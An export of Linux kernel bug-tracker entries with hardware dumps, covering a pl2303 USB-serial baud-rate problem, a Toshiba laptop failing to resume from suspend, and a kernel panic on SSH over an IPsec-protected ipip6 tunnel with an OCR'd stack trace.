Count=1/1 Maskable- 64bit+ Address: 00000000fee0f00c Data: 4152 Capabilities: [70] Express (v1) Root Complex Integrated Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE- FLReset+ DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #0, Speed unknown, Width x0, ASPM unknown, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed unknown, Width x0, TrErr- Train- SlotClk- DLActive- BWMgmt- ABWMgmt- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- VC1: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=1 ArbSelect=Fixed TC/VC=22 Status: NegoPending- InProgress- Capabilities: [130 v1] Root Complex Link Desc: PortNumber=0f ComponentID=00 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=00 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel driver in use: snd_hda_intel Kernel modules: snd_hda_intel 00:1c.0 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 1 (rev b5) (prog-if 00 [Normal decode]) Control: I/O- Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v2) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #1, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;1us, L1 &lt;16us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM L0s L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x0, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #0, PowerLimit 10.000W; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet- Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- DevCap2: Completion Timeout: Range BC, TimeoutDis+, LTR-, OBFF Not Supported ARIFwd- DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis-, LTR-, OBFF Disabled ARIFwd- LnkCtl2: Target Link Speed: 5GT/s, EnterCompliance- SpeedDis- Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -3.5dB, EqualizationComplete-, EqualizationPhase1- EqualizationPhase2-, EqualizationPhase3-, LinkEqualizationRequest- Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [90] Subsystem: Dell Device 052e Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: pcieport Kernel modules: shpchp 00:1c.1 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 2 (rev b5) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 Memory behind bridge: f0500000-f05fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v2) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #2, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;16us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt+ ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #1, PowerLimit 10.000W; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet- LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- DevCap2: Completion Timeout: Range BC, TimeoutDis+, LTR-, OBFF Not Supported ARIFwd- DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis-, LTR-, OBFF Disabled ARIFwd- LnkCtl2: Target Link Speed: 5GT/s, EnterCompliance- SpeedDis- Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -3.5dB, EqualizationComplete-, EqualizationPhase1- EqualizationPhase2-, EqualizationPhase3-, LinkEqualizationRequest- Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [90] Subsystem: Dell Device 052e Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: pcieport Kernel modules: shpchp 00:1c.3 PCI bridge: Intel Corporation 6 Series/C200 Series Chipset Family PCI Express Root Port 4 (rev b5) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 Memory behind bridge: f0400000-f04fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v2) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #4, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;16us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt+ ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #3, PowerLimit 10.000W; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet- LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- DevCap2: Completion Timeout: Range BC, TimeoutDis+, LTR-, OBFF Not Supported ARIFwd- DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis-, LTR-, OBFF Disabled ARIFwd- LnkCtl2: Target Link Speed: 5GT/s, EnterCompliance- SpeedDis- Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB, EqualizationComplete-, EqualizationPhase1- EqualizationPhase2-, EqualizationPhase3-, LinkEqualizationRequest- Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [90] Subsystem: Dell Device 052e Capabilities: [a0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: pcieport Kernel modules: shpchp 00:1d.0 USB controller: Intel Corporation 6 Series/C200 Series Chipset Family USB Enhanced Host Controller #1 (rev 05) (prog-if 20 [EHCI]) Subsystem: Dell Device 052e Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 23 Region 0: Memory at f0609000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Debug port: BAR=1 offset=00a0 Capabilities: [98] PCI Advanced Features AFCap: TP+ FLR+ AFCtrl: FLR- AFStatus: TP- Kernel driver in use: ehci-pci Kernel modules: ehci_pci 00:1f.0 ISA bridge: Intel Corporation QS67 Express Chipset Family LPC Controller (rev 05) Subsystem: Dell Device 052e Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [e0] Vendor Specific Information: Len=0c &lt;?&gt; Kernel driver in use: lpc_ich Kernel modules: lpc_ich 00:1f.2 SATA controller: Intel Corporation 6 Series/C200 Series Chipset Family 6 port SATA AHCI Controller (rev 05) (prog-if 01 [AHCI 1.0]) Subsystem: Dell Device 052e Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 47 Region 0: I/O ports at 2088 [size=8] Region 1: I/O ports at 2094 [size=4] Region 2: I/O ports at 2080 [size=8] Region 3: I/O ports at 2090 [size=4] Region 4: I/O ports at 2060 [size=32] Region 5: Memory at f0608000 (32-bit, non-prefetchable) [size=2K] Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0f00c Data: 4122 Capabilities: [70] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold-) Status: D0 NoSoftRst+ PME-Enable- DSel=0 DScale=0 PME- Capabilities: [a8] SATA HBA v1.0 BAR4 Offset=00000004 Capabilities: [b0] PCI Advanced Features AFCap: TP+ FLR+ AFCtrl: FLR- AFStatus: TP- Kernel driver in use: ahci Kernel modules: ahci 00:1f.3 SMBus: Intel Corporation 6 Series/C200 Series Chipset Family SMBus Controller (rev 05) Subsystem: Dell Device 052e Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin C routed to IRQ 18 Region 0: Memory at f0604000 (64-bit, non-prefetchable) [size=256] Region 4: I/O ports at efa0 [size=32] Kernel modules: i2c_i801 02:00.0 Network controller: Intel Corporation Centrino Advanced-N 6230 [Rainbow Peak] (rev 34) Subsystem: Intel Corporation Centrino Advanced-N 6230 AGN Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 49 Region 0: Memory at f0500000 (64-bit, non-prefetchable) [size=8K] Capabilities: [c8] Power Management version 3 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [d0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0f00c Data: 4162 Capabilities: [e0] Express (v1) Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;512ns, L1 unlimited ExtTag- AttnBtn- AttnInd- PwrInd- RBE+ FLReset+ DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ FLReset- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr+ UncorrErr- FatalErr- UnsuppReq+ AuxPwr+ TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;4us, L1 &lt;32us ClockPM+ Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- Capabilities: [100 v1] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UESvrt: DLP+ SDES- TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF+ MalfTLP+ ECRC- UnsupReq- ACSViol- CESta: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ AERCap: First Error Pointer: 00, GenCap- CGenEn- ChkCap- ChkEn- Capabilities: [140 v1] Device Serial Number 88-53-2e-ff-ff-e0-4c-5a Kernel driver in use: iwlwifi Kernel modules: iwlwifi 03:00.0 USB controller: Fresco Logic FL1009 USB 3.0 Host Controller (rev 02) (prog-if 30 [XHCI]) Subsystem: Dell Device 052e Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 19 Region 0: Memory at f0400000 (64-bit, non-prefetchable) [size=64K] Region 2: Memory at f0410000 (64-bit, non-prefetchable) [size=4K] Region 4: Memory at f0411000 (64-bit, non-prefetchable) [size=4K] Capabilities: [40] Power Management version 3 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=375mA PME(D0+,D1+,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] MSI: Enable- Count=1/8 Maskable- 64bit+ Address: 0000000000000000 Data: 0000 Capabilities: [70] Express (v2) Endpoint, MSI 00 DevCap: MaxPayload 512 bytes, PhantFunc 0, Latency L0s unlimited, L1 unlimited ExtTag- AttnBtn- AttnInd- PwrInd- RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr+ UncorrErr- FatalErr- UnsuppReq+ AuxPwr+ TransPend- LnkCap: Port #0, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 unlimited, L1 unlimited ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- DevCap2: Completion Timeout: Not Supported, TimeoutDis+, LTR-, OBFF Not Supported DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis-, LTR-, OBFF Disabled LnkCtl2: Target Link Speed: 5GT/s, EnterCompliance- SpeedDis- Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB, EqualizationComplete-, EqualizationPhase1- EqualizationPhase2-, EqualizationPhase3-, LinkEqualizationRequest- Capabilities: [b0] MSI-X: Enable+ Count=8 Masked- Vector table: BAR=2 offset=00000000 PBA: BAR=4 offset=00000000 Capabilities: [100 v1] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol- UESvrt: DLP+ SDES+ TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF+ MalfTLP+ ECRC- UnsupReq- ACSViol- CESta: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ AERCap: First Error Pointer: 00, GenCap+ CGenEn- ChkCap+ ChkEn- Kernel driver in use: xhci_hcd Kernel modules: xhci_hcd</t>
  </si>
  <si>
    <t>Bug in pl2303 driver.</t>
  </si>
  <si>
    <t>3.8.0-21</t>
  </si>
  <si>
    <t>2013-05-21 18:02 UTC</t>
  </si>
  <si>
    <t>mindentropy</t>
  </si>
  <si>
    <t>2013-11-13 20:20 UTC</t>
  </si>
  <si>
    <t>Hi, I have a usb to serial converter of which one is a BAFO and another a QinHeng Electronics HL-340 USB-Serial adapter. Both of them use prolific pl2303 driver. Whenever I change my baudrate to 115200 I get junk characters and the BAFO gives a lot of them. lsusb output: Bus 003 Device 004: ID 1a86:7523 QinHeng Electronics HL-340 USB-Serial adapter Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 255 Vendor Specific Class bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 8 idVendor 0x1a86 QinHeng Electronics idProduct 0x7523 HL-340 USB-Serial adapter bcdDevice 2.54 iManufacturer 0 iProduct 2 USB2.0-Serial iSerial 0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 39 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0x80 (Bus Powered) MaxPower 96mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 3 bInterfaceClass 255 Vendor Specific Class bInterfaceSubClass 1 bInterfaceProtocol 2 iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x82 EP 2 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0020 1x 32 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x02 EP 2 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0020 1x 32 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0008 1x 8 bytes bInterval 1 Device Status: 0x0000 (Bus Powered) Bus 003 Device 005: ID 067b:2303 Prolific Technology, Inc. PL2303 Serial Port Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x067b Prolific Technology, Inc. idProduct 0x2303 PL2303 Serial Port bcdDevice 3.00 iManufacturer 1 Prolific Technology Inc. iProduct 2 USB 2.0 To COM Device iSerial 0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 39 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0x80 (Bus Powered) MaxPower 100mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 3 bInterfaceClass 255 Vendor Specific Class bInterfaceSubClass 0 bInterfaceProtocol 0 iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x000a 1x 10 bytes bInterval 1 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x02 EP 2 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0040 1x 64 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x83 EP 3 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0040 1x 64 bytes bInterval 0 Device Status: 0x0000 (Bus Powered)</t>
  </si>
  <si>
    <t>Unable to resume after suspend to RAM</t>
  </si>
  <si>
    <t>3.9.0 - 3.9.4</t>
  </si>
  <si>
    <t>2013-05-22 13:22 UTC</t>
  </si>
  <si>
    <t>Maciek</t>
  </si>
  <si>
    <t>2013-06-28 05:25 UTC</t>
  </si>
  <si>
    <t>Created attachment 102231 [details] lspci output Resuming after suspend to RAM don't work. After resume the screen turns on and display the last picture from before suspend or is black. The back-light is on. The fan starts to work strongly after few seconds (some infinite loop?). There is nothing written to syslog after suspend. Problem occur in mainline 2.9.1 and 2.9.3. Resume in 2.8.11 works fine. Steps to reproduce: - suspend to RAM with hot-key - try to resume (power button) Systems stay frozen with backlight and fan funing at max. speed. Hardware: Toshiba Tecra R-850 (core i7).</t>
  </si>
  <si>
    <t>Sudden kernel panic on SSH connect over encrypted ipip6 tunnel</t>
  </si>
  <si>
    <t>2013-05-23 10:40 UTC</t>
  </si>
  <si>
    <t>_Vi</t>
  </si>
  <si>
    <t>2013-11-13 20:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 102321 [details] Screen photo with kernel panic message I type "ssh use@thehost -L 3389:127.0.0.1:3389" and suddenly the kernel panic. Networking setup is rather tricky: 1. thehost is tunneled thought the ipip6 tunnel; 2. the ipip6 tunnel is protected by IPsec; 3. IPv6 connection is forwarded thought veth to other network namespace where it gets into TUN-based tunnelling program. OCR-ed text from the photo: &lt;upper lines trimmed and can't scroll up due to the panic&gt; [621700.153844] [&lt;c0508eb3&gt;] ? nf_iterate+Ox3e/Ox6b [621700.153981] W868a29d&gt;1 ? xfrm6_prepare_output+0x45/0x45 [ipu6] [621700.154118] [&lt;c05081'37&gt;] ? nf_hook_slow+0x57/0xec [621700.154260] [a868a330&gt;] xfrm6_output+0x93/Oxf4 [ipu6] [621700.154414] W868a475&gt;1 xfrm6_output+0x24/0x5f [ipu6] [621700.157013] W868a29d&gt;1 ? xfrm6_prepare_output+0x45/0x45 Eipu6] [621700.157013] W8663d17&gt;1 ip6_loca1_out+0x20/0x23 [ipu6] [621700.157013] [adl3e0a4&gt;] ip6_tn1_xmit2+0x37e/Ox4le [ip6_tunne1] [621700.157013] Eadl3e471&gt;1 ip6_tn1_xmit+Oxe8/0x29a [ip6_tunnel] [621700.157013] [&lt;c04eb93f&gt;] deu_hard_start_xmit+Ox28d/Ox426 [621700.157013] [&lt;c04ebf03&gt;1 deuqueue_xmit+Ox268/0x3lf [621700.157013] [&lt;c0508eb3&gt;] ? nf_iterate+Ox3e/Ox6b [621700.157013] [&lt;c04f16bc&gt;] neigh_direct_output+Oxf/Ox11 [621700.1570131 [&lt;c0510eef&gt;] ip_finish_output+Ox2f2/0x37c [621700.157013] [&lt;c0508f37&gt;] ? nf_hook_slow+Ox57/0xec [621700.157013] [&lt;c0510bfd&gt;1 ? ip_fragment+Ox7a1/0x7a1 [621700.157013] [&lt;c0511edl&gt;] ip_output+Ox78/Oxbb [621700.157013] [&lt;c0510bfd&gt;] ? ip_fragment+Ox7a1/0x7a1 [621700.1570131 [&lt;c05117dd&gt;1 ip_local_out+Ox20/0x23 [621700.157013] [&lt;c0511a91&gt;] ip_gueue_xmit+Ox2b1/0x30b [621700.157013] [&lt;c0523644&gt;1 tcp_transmit_skb+0x67f/Ox6d9 [621700.157013] [&lt;c0523e5c&gt;1 tcp write_xmit+Ox732/0x8lf [621700.157013] [&lt;c0523f81&gt;] tcp_push_one+0x38/0x3a [621700.157013] [&lt;c0519270] tcp_sendmsg+0x854/0xab1 [621700.157013] [&lt;c0535e6b&gt;] inet_sendmsg+0x54/0x7e [621700.157013] [&lt;c04d9864&gt;] sock_aio_write+Oxb9/0xdO [621700.157013] [&lt;cOldd7e9&gt;1 do_sync_write+0x84/0xcl [621700.157013] [&lt;cOldde08&gt;] ufs_write+Ox9f/Ox144 [621700.157013] [CcOlde09b&gt;1 sys_write+Ox41/0x6c [621700.157013] [&lt;c058cb6f&gt;1 syscall_call+0x7/Oxb [621700.157013] Code: de e8 el c2 e5 c7 58 5d 5b 5e 5f 5d c3 55 89 e5 57 56 53 8d 64 24 fie 3e ed 74 26 00 89 45 f0 8b 80 414 01 0 0 00 89 55 e8 89 4d ec &lt;f6&gt; 40 62 01 Of 84 c8 00 00 00 31 c9 c7 04 24 ff ff ff ff ba 20 [621700.157013] EIP: W8684c71&gt;1 ipub_local error+Oxle/Oxf9 Eipu6] 33 :ESP 0068:d89dda60 [621700.157013] 